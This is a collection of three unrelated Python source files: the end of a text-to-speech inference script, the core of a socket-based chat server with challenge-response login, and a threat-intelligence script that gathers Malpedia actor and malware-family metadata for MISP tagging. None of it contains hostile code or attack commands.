else:
args.model_dir = Path.cwd()
if args.output_dir:
args.output_dir = Path(args.output_dir)
args.output_dir.mkdir(parents=True, exist_ok=True)
else:
args.output_dir = Path.cwd()
# Load config
config_path = args.model_dir / "config.json"
_LOGGER.debug("Loading configuration(s) from %s", config_path)
with open(config_path, "r", encoding="utf-8") as config_file:
config = TrainingConfig.load(config_file)
_LOGGER.debug(config)
phoneme_to_id = {}
if args.text:
# Load phonemes
num_phonemes = 0
phonemes_path = args.model_dir / "phonemes.txt"
_LOGGER.debug("Loading configuration(s) from %s", phonemes_path)
with open(phonemes_path, "r", encoding="utf-8") as phonemes_file:
for line in phonemes_file:
line = line.strip("\r\n")
if (not line) or line.startswith("#"):
continue
phoneme_id, phoneme = re.split(r"[ \t]", line, maxsplit=1)
# Avoid overwriting duplicates
if phoneme not in phoneme_to_id:
phoneme_id = int(phoneme_id)
phoneme_to_id[phoneme] = phoneme_id
# Need to count separately because phonemes may be duplicated
num_phonemes += 1
assert (
num_phonemes == config.model.num_symbols
), f"Model has {config.model.num_symbols}, but phonemes.txt has {num_phonemes}"
# Load checkpoint
start_time = time.perf_counter()
# Checkpoint
if args.checkpoint:
checkpoint_path = Path(args.checkpoint)
else:
checkpoint_path = args.model_dir / "best_model.pth"
_LOGGER.debug("Loading checkpoint from %s", checkpoint_path)
model = load_checkpoint(
str(checkpoint_path),
config=config,
load_discrimiator=False,
load_optimizers=False,
load_schedulers=False,
use_cuda=args.cuda,
).model_g
end_time = time.perf_counter()
_LOGGER.info(
"Loaded checkpoint from %s in %s second(s)",
checkpoint_path,
end_time - start_time,
)
if args.cuda:
model.cuda()
model.eval()
# Multispeaker
if config.model.n_speakers > 1:
if args.speaker is None:
args.speaker = 0
# -------------------------------------------------------------------------
if os.isatty(sys.stdin.fileno()):
print("Reading whitespace-separated phoneme ids from stdin...", file=sys.stderr)
# Read phoneme ids from standard input.
# Phoneme ids are separated by whitespace (<p1> <p2> ...)
try:
for line in sys.stdin:
line = line.strip()
if not line:
continue
utt_id = "output"
speaker_num = args.speaker
if args.csv:
# Input format is id | p1 p2 p3...
line_parts = line.split("|", maxsplit=3)
utt_id = line_parts[0]
line = line_parts[-1]
if (len(line_parts) > 2) and (config.model.n_speakers > 1):
speaker_num = int(line_parts[1])
if args.text:
# Map phonemes to ids
assert phoneme_to_id, "No phonemes were loaded"
phoneme_ids = [phoneme_to_id[p] for p in line if p in phoneme_to_id]
# phoneme_ids = intersperse(phoneme_ids, 0)
else:
# Phoneme ids as p1 p2 p3...
phoneme_ids = [int(p) for p in line.split()]
_LOGGER.debug("%s (id=%s)", phoneme_ids, utt_id)
with torch.no_grad():
text = torch.LongTensor(phoneme_ids).unsqueeze(0)
text_lengths = torch.LongTensor([text.shape[1]])
speaker_id = None
if config.model.n_speakers > 1:
speaker_id = torch.LongTensor([speaker_num])
if args.cuda:
text.contiguous().cuda()
text_lengths.contiguous().cuda()
if speaker_id is not None:
speaker_id = speaker_id.cuda()
_LOGGER.debug(
"Inferring audio for %s symbols (speaker=%s)",
text.shape[1],
speaker_id,
)
start_time = time.perf_counter()
audio = (
model.infer(
text,
text_lengths,
sid=speaker_id,
noise_scale=args.noise_scale,
noise_scale_w=args.noise_scale_w,
length_scale=args.length_scale,
)[0][0, 0]
.data.cpu()
.float()
.numpy()
)
audio = audio_float_to_int16(audio)
end_time = time.perf_counter()
_LOGGER.debug(
"Generated audio in %s second(s) (%s, shape=%s)",
end_time - start_time,
utt_id,
list(audio.shape),
)
output_file_name = utt_id
if not output_file_name.endswith(".wav"):
output_file_name += ".wav"
output_path = args.output_dir / output_file_name
output_path.parent.mkdir(parents=True, exist_ok=True)
write_wav(str(output_path), config.audio.sample_rate, audio)
_LOGGER.info("Wrote WAV to %s", output_path)
except KeyboardInterrupt:
pass
# -----------------------------------------------------------------------------
if __name__ == "__main__":
main()
|
<reponame>DmitryTakmakov/Takmachat<filename>server/server/server/core.py<gh_stars>0
"""
All the main functions for the server app
"""
from binascii import hexlify, a2b_base64
from hmac import new, compare_digest
from json import JSONDecodeError
from logging import getLogger
from os import urandom
from select import select
from socket import socket, AF_INET, SOCK_STREAM
from threading import Thread
from utils.constants import MAX_NUMBER_OF_CONNECTIONS, ACTION, \
PRESENCE, TIME, USER, MESSAGE, SENDER, DESTINATION, \
MESSAGE_TEXT, RESPONSE, ERROR, EXIT, ACCOUNT_NAME, GET_CONTACTS, \
LIST_INFO, ADD_CONTACT, REMOVE_CONTACT, USER_REQUEST, \
PUBLIC_KEY_REQUEST, DATA, PUBLIC_KEY
from utils.descriptors import Port
from utils.utils import receive_message, send_message
SERVER_LOGGER = getLogger('server')
class MessagingServer(Thread):
"""
The main class of the server.
"""
port = Port()
def __init__(self,
listening_address: str,
listening_port: int,
db):
"""
Server initialization.
Creates the attributes needed for the server to work,
sets the working flag as True.
:param listening_address: server's IP address
:param listening_port: server's port
:param db: server's database
"""
self.listening_address = listening_address
self.listening_port = listening_port
self.server_db = db
self.server_socket = None
self.clients_list = []
self.sockets_list = None
self.exceptions_list = None
self.messages_queue = list()
self.nicknames = dict()
self.working = True
super().__init__()
def run(self):
"""
The main loop of the server.
Creates a listening socket, and then accepts connections while the working flag is True.
If there are clients with messages, sends them.
"""
self.server_socket = socket(AF_INET, SOCK_STREAM)
self.server_socket.bind(
(self.listening_address, self.listening_port)
)
self.server_socket.settimeout(0.5)
self.server_socket.listen(MAX_NUMBER_OF_CONNECTIONS)
try:
while self.working:
try:
client_socket, client = self.server_socket.accept()
addr, port = client
except OSError:
pass
else:
SERVER_LOGGER.info(
'Установлено соединение с пользователем: '
'адрес: %s, порт: %s.' % (addr, port,)
)
client_socket.settimeout(5)
self.clients_list.append(client_socket)
ready_to_receive = []
ready_to_send = []
exceptions_list = []
try:
if self.clients_list:
ready_to_send, self.sockets_list, self.exceptions_list = select(
self.clients_list,
self.clients_list,
[],
0
)
except OSError as err:
SERVER_LOGGER.error(
'Ошибка работы с сокетами: %s.' % err
)
if ready_to_send:
for client in ready_to_send:
try:
self.process_client_message(
receive_message(client),
client
)
except (OSError,
JSONDecodeError,
TypeError) as e:
SERVER_LOGGER.error(
'Ошибка при запросе '
'информации от клиента.',
exc_info=e
)
self.delete_client(client)
except KeyboardInterrupt:
SERVER_LOGGER.info('Серер остановлен пользователем.')
self.server_socket.close()
def process_client_message(self, message: dict, client: socket):
"""
Handles the messages from clients according to their service codes.
This method handles authorization, client's exit, contact list, existing users'
and public key requests, requests to add or delete a contact and messages from
client to client (this method also records these messages to server DB). This method
triggers a relevant handler if needed, or tries to send a response with a relevant
service code (200, 202, 511 or 400 in case of bad request). If sending a message
was not possible, this method deletes the user from the list of active users.
:param message: dictionary with a message
:param client: client's socket
"""
SERVER_LOGGER.debug(
'Обработка входящего сообщения: %s.' % message
)
# авторизация клиента
if ACTION in message and message[ACTION] == PRESENCE \
and TIME in message and USER in message:
self.authorize_client(message, client)
# сообщение от клиента
elif ACTION in message and message[ACTION] == MESSAGE and \
SENDER in message and DESTINATION in message and \
TIME in message and MESSAGE_TEXT in message \
and self.nicknames[message[SENDER]] == client:
if message[DESTINATION] in self.nicknames:
self.messages_queue.append(message)
self.server_db.record_message_to_history(
message[SENDER],
message[DESTINATION]
)
self.send_client_message(message)
try:
send_message(client, {RESPONSE: 200})
except OSError:
self.delete_client(client)
else:
response = {
RESPONSE: 400,
ERROR: 'Пользователь не зарегистрирован на сервере.'
}
try:
send_message(client, response)
except OSError:
pass
return
# клиент выходит
elif ACTION in message and message[ACTION] == EXIT and \
ACCOUNT_NAME in message:
self.delete_client(client)
# запрос списка контактов
elif ACTION in message and message[ACTION] == GET_CONTACTS \
and USER in message \
and self.nicknames[message[USER]] == client:
response = {
RESPONSE: 202,
LIST_INFO: self.server_db.get_user_contact_list(
message[USER])
}
try:
send_message(client, response)
except OSError:
self.delete_client(client)
# запрос на добавление контакта
elif ACTION in message and message[ACTION] == ADD_CONTACT \
and ACCOUNT_NAME in message and USER in message \
and self.nicknames[message[USER]] == client:
self.server_db.add_contact_to_list(
message[USER],
message[ACCOUNT_NAME]
)
try:
send_message(client, {RESPONSE: 200})
except OSError:
self.delete_client(client)
# запрос на удаление контакта
elif ACTION in message and message[ACTION] == REMOVE_CONTACT \
and ACCOUNT_NAME in message and USER in message \
and self.nicknames[message[USER]] == client:
self.server_db.remove_contact_from_list(
message[USER],
message[ACCOUNT_NAME]
)
try:
send_message(client, {RESPONSE: 200})
except OSError:
self.delete_client(client)
# запрос списка пользователей
elif ACTION in message and message[ACTION] == USER_REQUEST \
and ACCOUNT_NAME in message \
and self.nicknames[message[ACCOUNT_NAME]] == client:
response = {
RESPONSE: 202,
LIST_INFO: [
user[0] for user in self.server_db.all_users_list()
]
}
try:
send_message(client, response)
except OSError:
self.delete_client(client)
# запрос публичного ключа клиента
elif ACTION in message and message[ACTION] == \
PUBLIC_KEY_REQUEST and ACCOUNT_NAME in message:
response = {
RESPONSE: 511,
DATA: self.server_db.get_user_public_key(
message[ACCOUNT_NAME])
}
if response[DATA]:
try:
send_message(client, response)
except OSError:
self.delete_client(client)
else:
response = {
RESPONSE: 400,
ERROR: 'Отсутствует публичный ключ пользователя.'
}
try:
send_message(client, response)
except OSError:
self.delete_client(client)
else:
response = {
RESPONSE: 400,
ERROR: 'bad request'
}
try:
send_message(client, response)
except OSError:
self.delete_client(client)
def authorize_client(self, message: dict, client: socket):
"""
Handles the client's authorization. Checks if the username isn't already taken,
then checks if the user is registered on the server. If those two checks pass,
the method then initiates the exchange of encrypted passwords with the client.
If the password is correct, the client is logged onto the server, otherwise the
client is removed from the server and his socket gets closed.
:param message: presence message
:param client: client's socket
"""
SERVER_LOGGER.debug(
'Старт процесса авторизации пользователя %s' %
message[USER]
)
if message[USER][ACCOUNT_NAME] in self.nicknames.keys():
response = {
RESPONSE: 400,
ERROR: 'Имя пользователя уже занято'
}
try:
send_message(client, response)
except OSError as e:
SERVER_LOGGER.debug('Произошла ошибка: %s' % e)
pass
self.clients_list.remove(client)
client.close()
elif not self.server_db.check_existing_user(
message[USER][ACCOUNT_NAME]):
response = {
RESPONSE: 400,
ERROR: 'Пользователь не зарегистрирован'
}
try:
SERVER_LOGGER.debug(
'Пользователь %s не зарегистрирован' %
message[USER][ACCOUNT_NAME]
)
send_message(client, response)
except OSError as e:
SERVER_LOGGER.debug('Произошла ошибка: %s' % e)
pass
else:
SERVER_LOGGER.debug('Начало проверки пароля')
random_string = hexlify(urandom(64))
auth_response = {
RESPONSE: 511,
DATA: random_string.decode('ascii')
}
pwd_hash = new(
self.server_db.get_user_pwd_hash(
message[USER][ACCOUNT_NAME]),
random_string,
'MD5'
)
pwd_digest = pwd_hash.digest()
SERVER_LOGGER.debug(
'Подготовлено сообщение для авторизации: %s' %
auth_response
)
try:
send_message(client, auth_response)
client_response = receive_message(client)
except OSError as e:
SERVER_LOGGER.debug(
'Ошибка при авторизации: ', exc_info=e
)
client.close()
return
client_digest = a2b_base64(client_response[DATA])
if RESPONSE in client_response and \
client_response[RESPONSE] == 511 and \
compare_digest(pwd_digest, client_digest):
self.nicknames[message[USER][ACCOUNT_NAME]] = client
client_addr, client_port = client.getpeername()
try:
send_message(client, {RESPONSE: 200})
except OSError:
self.delete_client(client)
self.server_db.login_user(
message[USER][ACCOUNT_NAME],
client_addr,
client_port,
message[USER][PUBLIC_KEY]
)
else:
response = {
RESPONSE: 400,
ERROR: 'Неверный пароль'
}
try:
send_message(client, response)
except OSError:
pass
self.clients_list.remove(client)
client.close()
def send_client_message(self, message: dict):
"""
Handles the exchange of messages between clients.
Validates the message and sends it if correct
:param message: dictionary with the message
"""
if message[DESTINATION] in self.nicknames and \
self.nicknames[message[DESTINATION]] in \
self.sockets_list:
send_message(self.nicknames[message[DESTINATION]],
message)
SERVER_LOGGER.info(
'Было отправлено сообщение пользователю '
'%s от пользователя %s.' %
(message[DESTINATION], message[SENDER])
)
elif message[DESTINATION] in self.nicknames and \
self.nicknames[message[DESTINATION]] \
not in self.sockets_list:
SERVER_LOGGER.error(
'Потеряна связь с клиентом %s, '
'отправка сообщения не возможна.' %
self.nicknames[message[DESTINATION]]
)
self.delete_client(self.nicknames[message[DESTINATION]])
else:
SERVER_LOGGER.error(
'Пользователь %s не зарегистрирован на сервере, '
'отправка сообщения не возможна.' %
message[DESTINATION]
)
def delete_client(self, client: socket):
"""
Closes the connection with the client who decided to leave the server.
Logs him out in the DB, deletes from the list of active users and closes the socket.
:param client: client's socket
"""
SERVER_LOGGER.info(
'Клиент %s отключился от сервера' % client)
for name in self.nicknames:
if self.nicknames[name] == client:
self.server_db.logout_user(name)
del self.nicknames[name]
break
self.clients_list.remove(client)
client.close()
def update_list(self):
"""
Generates the message with 205 code that triggers the update of contact
and active users' lists for all active clients.
"""
for name in self.nicknames:
try:
send_message(self.nicknames[name], {RESPONSE: 205})
except OSError:
self.delete_client(self.nicknames[name])
|
from copy import Error
import pymisp as pm
from pymisp import api
import malpedia_client as mp_Client
import mitre_functions as mf
import sanitizitation_functions as sf
import globals as gv
import misp_event_functions as mef
import database_actions as db
import os
import sys
import json
import time
import math
import glob
import datetime
import uuid
import misp_galaxy_functions as mgf
# import git_actions
import yaml
# import threading
import concurrent.futures as cf
from globals import _EXECUTOR as executor
# AUTHENTICATE TO MALPEDIA
def Authenticate():
try:
retClient = mp_Client.Client(apitoken=gv._MALPEDIA_KEY)
return retClient
except Exception as e:
print("f(x) Authenticate Error: {}".format(e))
sys.exit(e)
# CHECK IF IS A VALID DATE
def valid_date(datestring):
try:
datetime.datetime.strptime(datestring, '%Y-%m-%d')
return True
except ValueError:
return False
# FIX MALFORMED JSON
def fix_json(iJSON):
try:
yamlData = yaml.safe_load(iJSON)
jsonData = json.dumps(yamlData)
return jsonData
except:
exc_type, _, exc_tb = sys.exc_info()
fname = os.path.split(exc_tb.tb_frame.f_code.co_filename)[1]
print("f(x) fix_json: ERROR: {}: {}: {}".format(exc_type, fname, exc_tb.tb_lineno))
# READ SPECIMEN DATA FROM JSON FILE
def getSpecimenData(iFamilyName, iSha256):
# if not gv._DEBUG:
# print("{}:{}".format(iFamilyName, iSha256))
specimen_dict = {}
status = ""
version = ""
sha256 = ""
with open(gv._MALPEDIA_OUTPUT + "malware/" + iFamilyName + ".json", 'r') as jsonIn:
specimen_dict = json.loads(fix_json(jsonIn))
jsonIn.close()
for specimen in specimen_dict:
sha256 = specimen["sha256"]
if sha256 == iSha256:
status = specimen["status"]
version = specimen["version"]
break
return status, version, sha256
def stageMalwareSpecimens():
dirList = []
for path in gv._DIR_MALPEDIA_GIT_LIST:
listPath = path.split("/")
if len(listPath) > (gv._FAMILY_SPLIT_DEPTH + 1):
family = path.split("/")[gv._FAMILY_SPLIT_DEPTH]
dirList.append(family)
dirList.sort()
gv._MALWARE_FAMILY_SET = set(dirList)
try:
# DOWNLOAD MALWARE SPECIMENT LISTS AND WRITE THEM TO JSON
# THROTTLE SO IT DOESN'T LOCK API KEY
max_requests_per_minute = 40 #60 requests per minute is the max
current_request_count = 1
completed_malware_list = []
# MAKE THE COMPLETED FILE IF IT DOESN'T EXIST
completed_malware_file_path = gv._MALPEDIA_OUTPUT + "malware/" + "001.completed.maware.json"
if os.path.isfile(completed_malware_file_path):
completed_malware_file = open(completed_malware_file_path, 'r')
completed_malware_list = json.loads(fix_json(completed_malware_file.read()))
completed_malware_file.close()
else:
completed_malware_file = open(completed_malware_file_path, 'w')
completed_malware_file.write(json.dumps("[]"))
completed_malware_file.close
tStart = time.time()
tNow = None
tDiff = 0
iWait = 140
for malware in gv._MALWARE_FAMILY_SET:
if malware in completed_malware_list:
continue
with open(gv._MALPEDIA_OUTPUT + "malware/" + malware + ".json", 'w') as jsonOut:
print("f(x) stageMalwareSpecimens: PULLING DATA FOR MALWARE: {}".format(malware))
mpClient = Authenticate()
gv._CURRENT_FAMILY_CURRENT_SPECIMEN_DICT = mpClient.list_samples(malware)
jsonOut.write(json.dumps(gv._CURRENT_FAMILY_CURRENT_SPECIMEN_DICT))
jsonOut.close()
tNow = time.time()
tDiff = tNow - tStart
if ((current_request_count == max_requests_per_minute) and (tDiff <= iWait )):
tNow = time.time()
tDiff = tNow - tStart
print("f(x) stageMalwareSpecimens: API PULL THRESHHOLD REACHED.")
while (tDiff <= iWait):
time.sleep(1)
tNow = time.time()
tDiff = (tNow - tStart)
print("f(x) stageMalwareSpecimens: WAITING {} SECONDS.".format(math.ceil(iWait - tDiff)))
tStart = time.time()
current_request_count = 1
print("f(x) stageMalwareSpecimens: RESUMING PULLS")
else:
completed_malware_list.append(malware)
completed_malware_file = open(completed_malware_file_path, 'w')
completed_malware_file.write(json.dumps(completed_malware_list))
completed_malware_file.close
current_request_count += 1
# DEBUG SEQ
if gv._DEBUG:
print("f(x) stageMalwareSpecimens: {}: ADDED TO COMPLETED MALWARE.".format(malware))
# os.remove(completed_malware_file_path)
print("f(x) stageMalwareSpecimens: COMPLETED DOWNLOAD OF MALWARE SPECIMEN INFO")
except Exception as e:
exc_type, _, exc_tb = sys.exc_info()
fname = os.path.split(exc_tb.tb_frame.f_code.co_filename)[1]
print("f(x) stageMalwareSpecimens: {}: {}: {}".format(exc_type, fname, exc_tb.tb_lineno))
sys.exit(e)
def build_actor_malware_tree(threat_actor):
print("f(x) build_actor_malware_tree: STAGING DATA FOR {}".format(threat_actor.upper()))
lastupdated = datetime.date.today()
path_to_json = gv._MALPEDIA_OUTPUT + "actors/" + threat_actor + ".json"
# READ THE THREAT ACTOR JSON FILE
gv._CURRENT_ACTOR_MITRE_GROUP_CODE = "NONE"
gv._CURRENT_ACTOR_MITRE_TECHNIQUE_IDS = []
gv._CURRENT_ACTOR_TECHNIQUE_TAGS = []
with open(path_to_json, 'r') as jsonIn:
try:
gv._CURRENT_ACTOR_INFO_DICT = json.loads(fix_json(jsonIn))
jsonIn.close()
except:
exc_type, _, exc_tb = sys.exc_info()
fname = os.path.split(exc_tb.tb_frame.f_code.co_filename)[1]
print("f(x) build_actor_malware_tree: BUILD THREAT ACTOR JSON FILE ERROR: {}: {}: {}".format(exc_type, fname, exc_tb.tb_lineno))
#-----------------------------------------------------------------------------------------------------------------
# TOP LEVEL VALUES------------------------------------------------------------------------------------------------
#-----------------------------------------------------------------------------------------------------------------
if gv._DEBUG:
print("f(x) build_actor_malware_tree: TOP LEVEL")
print("+" * 75)
# STRING NAME OF ACTOR WITH FIRST CHARACTER CAPITALIZED
try:
gv._CURRENT_ACTOR_NAME_STR = gv._CURRENT_ACTOR_INFO_DICT["value"].strip()
except:
gv._CURRENT_ACTOR_NAME_STR = ""
# DEBUG SEQ
if gv._DEBUG:
print("f(x) build_actor_malware_tree: ACTOR NAME: {}".format(gv._CURRENT_ACTOR_NAME_STR))
# STRING OF ACTOR DESCRIPTION
try:
gv._CURRENT_ACTOR_DESCRIPTION_STR = gv._CURRENT_ACTOR_INFO_DICT["description"].strip()
except:
gv._CURRENT_ACTOR_DESCRIPTION_STR = ""
# DEBUG SEQ
if gv._DEBUG:
print("f(x) build_actor_malware_tree: ACTOR DESCRIPTION: {}".format(gv._CURRENT_ACTOR_DESCRIPTION_STR))
# STRING OF UUID
try:
gv._CURRENT_ACTOR_UUID_STR = gv._CURRENT_ACTOR_INFO_DICT["uuid"].strip()
gv._ACTOR_UUID_DICT.update({gv._CURRENT_ACTOR_NAME_STR : gv._CURRENT_ACTOR_UUID_STR})
except:
gv._CURRENT_ACTOR_UUID_STR = ""
# DEBUG SEQ
if gv._DEBUG:
print("f(x) build_actor_malware_tree: ACTOR UUID: {}".format(gv._CURRENT_ACTOR_UUID_STR))
print("+" * 75)
#-----------------------------------------------------------------------------------------------------------------
# ACTOR META SECTION----------------------------------------------------------------------------------------------------
#-----------------------------------------------------------------------------------------------------------------
# GET META SECTION
try:
gv._CURRENT_ACTOR_META_DICT = gv._CURRENT_ACTOR_INFO_DICT["meta"]
except:
gv._CURRENT_ACTOR_META_DICT = {}
if gv._DEBUG:
print("f(x) build_actor_malware_tree: ACTOR META")
print("+" * 75)
# LIST OF STRINGS OF COUNTRY NAMES
try:
gv._CURRENT_ACTOR_META_CFR_SUSPECTED_VICTIMS_LIST = gv._CURRENT_ACTOR_META_DICT["cfr-suspected-victims"]
except:
gv._CURRENT_ACTOR_META_CFR_SUSPECTED_VICTIMS_LIST = []
# DEBUG SEQ
if gv._DEBUG:
print("f(x) build_actor_malware_tree: ACTOR SUSPECTED VICTIMS")
print(*gv._CURRENT_ACTOR_META_CFR_SUSPECTED_VICTIMS_LIST, sep = "\n")
# STRING OF TWO DIGIT COUNTRY CODE
try:
gv._CURRENT_ACTOR_META_COUNTRY_STR = gv._CURRENT_ACTOR_META_DICT["country"].strip()
except:
gv._CURRENT_ACTOR_META_COUNTRY_STR = ""
# DEBUG SEQ
if gv._DEBUG:
print("f(x) build_actor_malware_tree: ACTOR COUNTRY: {}".format(gv._CURRENT_ACTOR_META_COUNTRY_STR))
# print("*" * 50)
# LIST OF STRINGS OF LINKS TO ARTICLES
try:
gv._CURRENT_ACTOR_META_REFS_LIST = gv._CURRENT_ACTOR_META_DICT["refs"]
except:
gv._CURRENT_ACTOR_META_REFS_LIST = []
# DEBUG SEQ
if gv._DEBUG:
print("f(x) build_actor_malware_tree: ACTOR REFERENCES")
print(*gv._CURRENT_ACTOR_META_REFS_LIST, sep = "\n")
# LIST OF STRINGS OF TYPE OF ACTOR
try:
gv._CURRENT_ACTOR_META_CFR_TARGET_CATEGORY_LIST = gv._CURRENT_ACTOR_META_DICT["cfr-target-category"]
except:
gv._CURRENT_ACTOR_META_CFR_TARGET_CATEGORY_LIST = []
# DEBUG SEQ
if gv._DEBUG:
print("f(x) build_actor_malware_tree: TYPE OF ACTOR")
print(*gv._CURRENT_ACTOR_META_CFR_TARGET_CATEGORY_LIST, sep = "\n")
# STRING OF TYPE OF INCIDENT
try:
gv._CURRENT_ACTOR_META_CFR_TYPE_OF_INCIDENT_STR = gv._CURRENT_ACTOR_META_DICT["cfr-type-of-incident"].strip()
except:
gv._CURRENT_ACTOR_META_CFR_TYPE_OF_INCIDENT_STR = ""
# DEBUG SEQ
if gv._DEBUG:
print("f(x) build_actor_malware_tree: ACTOR INCIDENT TYPE: {}".format(gv._CURRENT_ACTOR_META_CFR_TYPE_OF_INCIDENT_STR))
# print("*" * 50)
# LIST OF STRINGS OF SYNONYMS
try:
gv._CURRENT_ACTOR_META_SYNONYMS_LIST = gv._CURRENT_ACTOR_META_DICT["synonyms"]
except:
gv._CURRENT_ACTOR_META_SYNONYMS_LIST = []
# DEBUG SEQ
if gv._DEBUG:
print("f(x) build_actor_malware_tree: ACTOR SYNONYMS")
print(*gv._CURRENT_ACTOR_META_SYNONYMS_LIST, sep = "\n")
# STRING OF STATE SPONSOR
try:
gv._CURRENT_ACTOR_META_CFR_STATE_SPONSOR_STR = gv._CURRENT_ACTOR_META_DICT["cfr-suspected-state-sponsor"].strip()
except:
gv._CURRENT_ACTOR_META_CFR_STATE_SPONSOR_STR = ""
# DEBUG SEQ
if gv._DEBUG:
print("f(x) build_actor_malware_tree: ACTOR STATE SPONSOR: {}".format(gv._CURRENT_ACTOR_META_CFR_STATE_SPONSOR_STR))
# print("*" * 50)
# STRING OF VICTIMOLOGY
try:
gv._CURRENT_ACTOR_META_VICTIMOLOGY_STR = gv._CURRENT_ACTOR_META_DICT["victimology"].strip()
except:
gv._CURRENT_ACTOR_META_VICTIMOLOGY_STR = ""
# DEBUG SEQ
if gv._DEBUG:
print("f(x) build_actor_malware_tree: ACTOR VICTIMOLOGY: {}".format(gv._CURRENT_ACTOR_META_VICTIMOLOGY_STR))
# print("*" * 50)
# STRING OF SINCE
try:
gv._CURRENT_ACTOR_META_SINCE_STR = gv._CURRENT_ACTOR_META_DICT["since"].strip()
except:
gv._CURRENT_ACTOR_META_SINCE_STR = ""
# DEBUG SEQ
if gv._DEBUG:
print("f(x) build_actor_malware_tree: ACTOR SINCE: {}".format(gv._CURRENT_ACTOR_META_SINCE_STR))
# print("*" * 50)
# STRING OF MODE OF OPERATION
try:
gv._CURRENT_ACTOR_META_MODEOFOPERATIONS_STR = gv._CURRENT_ACTOR_META_DICT["mode-of-operation"].strip()
except:
gv._CURRENT_ACTOR_META_MODEOFOPERATIONS_STR = ""
# DEBUG SEQ
if gv._DEBUG:
print("f(x) build_actor_malware_tree: ACTOR MODE OF OPERATION: {}".format(gv._CURRENT_ACTOR_META_MODEOFOPERATIONS_STR))
# print("*" * 50)
# STRING OF CAPABILITIES
try:
gv._CURRENT_ACTOR_META_CAPABILITIES_STR = gv._CURRENT_ACTOR_META_DICT["capabilities"].strip()
except:
gv._CURRENT_ACTOR_META_CAPABILITIES_STR = ""
# DEBUG SEQ
if gv._DEBUG:
print("f(x) build_actor_malware_tree: ACTOR CAPABILITIES: {}".format(gv._CURRENT_ACTOR_META_CAPABILITIES_STR))
# print("*" * 50)
# ---------------------------------------------------------------------
# BEGIN ACTOR META DATA DB INSERT
# ---------------------------------------------------------------------
# TAG FOR ACTOR
# ---------------------------------------------------------------------
# COMMON NAME
if gv._DEBUG:
print("f(x) build_actor_malware_tree: INSERT TAG: ACTOR: ACTOR COMMON NAME: {}".format(gv._CURRENT_ACTOR_NAME_STR))
db.insert_tag(gv._CURRENT_ACTOR_UUID_STR, "", gv._CURRENT_ACTOR_NAME_STR, "ACTOR")
# GET / INSERT MITRE GROUP DATA
knownGroupCodes = set()
group_code = ""
if gv._CURRENT_ACTOR_MITRE_GROUP_CODE == "NONE":
try:
gv._CURRENT_ACTOR_MITRE_GROUP_CODE = mf.get_group_code(gv._CURRENT_ACTOR_NAME_STR)
except:
gv._CURRENT_ACTOR_MITRE_GROUP_CODE = "NONE"
group_code = gv._CURRENT_ACTOR_MITRE_GROUP_CODE
if group_code != "NONE":
knownGroupCodes.add(group_code)
# GET MITRE GALAXY TAG:
mitre_tag = []
try:
mitre_tag = db.get_galaxy_specific_tags(group_code, "mitre-intrusion-set")
except Exception as e:
print(e)
mitre_tag = []
for tag in mitre_tag:
iGalaxy = tag["galaxy"]
iTag = tag["tag"]
db.insert_tag(gv._CURRENT_ACTOR_UUID_STR, iGalaxy, iTag, "GALAXY")
# GET ACTOR MITRE DATA TECHNIQUES
groupMitreTechniques = []
if len(gv._CURRENT_ACTOR_MITRE_TECHNIQUE_IDS) == 0:
gv._CURRENT_ACTOR_MITRE_TECHNIQUE_IDS = mf.get_group_technique_ids(gv._CURRENT_ACTOR_FAMILIES_CURRENT_FAMILY_STR)
else:
groupMitreTechniques = gv._CURRENT_ACTOR_MITRE_TECHNIQUE_IDS
groupMitreTags = []
if len(gv._CURRENT_ACTOR_TECHNIQUE_TAGS) == 0:
for tID in groupMitreTechniques:
retTags = db.get_galaxy_specific_tags(tID)
gv._CURRENT_ACTOR_TECHNIQUE_TAGS.append(retTags)
else:
groupMitreTags= gv._CURRENT_ACTOR_TECHNIQUE_TAGS
for tag in groupMitreTags:
for sub in tag:
iGalaxy = sub["galaxy"]
iTag = sub["tag"]
db.insert_tag(gv._CURRENT_ACTOR_UUID_STR, iGalaxy, iTag, "GALAXY")
# SHORT NAME
if gv._DEBUG:
print("f(x) build_actor_malware_tree: INSERT TAG: ACTOR: ACTOR SHORT NAME: {}".format(threat_actor))
db.insert_tag(gv._CURRENT_ACTOR_UUID_STR, "", threat_actor, "ACTOR")
# COUNTRY SPONSOR
if gv._DEBUG:
print("f(x) build_actor_malware_tree: INSERT TAG: ACTOR: ACTOR COUNTRY SPONSOR: {}".format(gv._CURRENT_ACTOR_META_CFR_STATE_SPONSOR_STR))
db.insert_tag(gv._CURRENT_ACTOR_UUID_STR, "", gv._CURRENT_ACTOR_META_CFR_STATE_SPONSOR_STR, "COUNTRY_SPONSOR")
# TYPES OF INCIDENTS
if gv._DEBUG:
print("f(x) build_actor_malware_tree: INSERT TAG: ACTOR: TYPES OF INCIDENTS: {}".format(gv._CURRENT_ACTOR_META_CFR_TYPE_OF_INCIDENT_STR))
db.insert_tag(gv._CURRENT_ACTOR_UUID_STR, "", gv._CURRENT_ACTOR_META_CFR_TYPE_OF_INCIDENT_STR, "TYPE_OF_INCIDENT")
# ISO COUNTRY (2 CHARACTER)
if gv._DEBUG:
print("f(x) build_actor_malware_tree: INSERT TAG: ACTOR: ISO COUNTRY (2 CHARACTER): {}".format(gv._CURRENT_ACTOR_META_COUNTRY_STR))
db.insert_tag(gv._CURRENT_ACTOR_UUID_STR, "", gv._CURRENT_ACTOR_META_COUNTRY_STR, "ISO_COUNTRY")
altActorTechniqueIDs = []
altActorTechniqueTags = set()
currentActorMetaSynonyms = set(gv._CURRENT_ACTOR_META_SYNONYMS_LIST)
if gv._DEBUG:
print("f(x) build_actor_malware_tree: INSERT TAG: ACTOR: ALT NAMES FOR THREAT ACTOR")
print(*currentActorMetaSynonyms, sep = "\n")
for value in currentActorMetaSynonyms:
db.insert_tag(gv._CURRENT_ACTOR_UUID_STR, "", value, "ACTOR")
# GET / INSERT MITRE GROUP DATA
group_code = ""
if gv._DEBUG:
print("f(x) build_actor_malware_tree: GETTING MITRE GROUP DATA")
try:
group_code = mf.get_group_code(value)
except:
group_code = gv._CURRENT_ACTOR_MITRE_GROUP_CODE
# IF IT IS NOT ONE WE ALREADY HAVE
if group_code != "NONE" and gv._CURRENT_ACTOR_MITRE_GROUP_CODE != "NONE" and group_code not in knownGroupCodes:
knownGroupCodes.add(group_code)
if gv._DEBUG:
print("f(x) build_actor_malware_tree: ADDING GROUP CODE: {}".format(group_code))
# GET MITRE GALAXY TAG:
mitre_tag = []
try:
mitre_tag = db.get_galaxy_specific_tags(group_code, "mitre-intrusion-set")
except Exception as e:
print("f(x) build_actor_malware_tree: {}".format(e))
mitre_tag = []
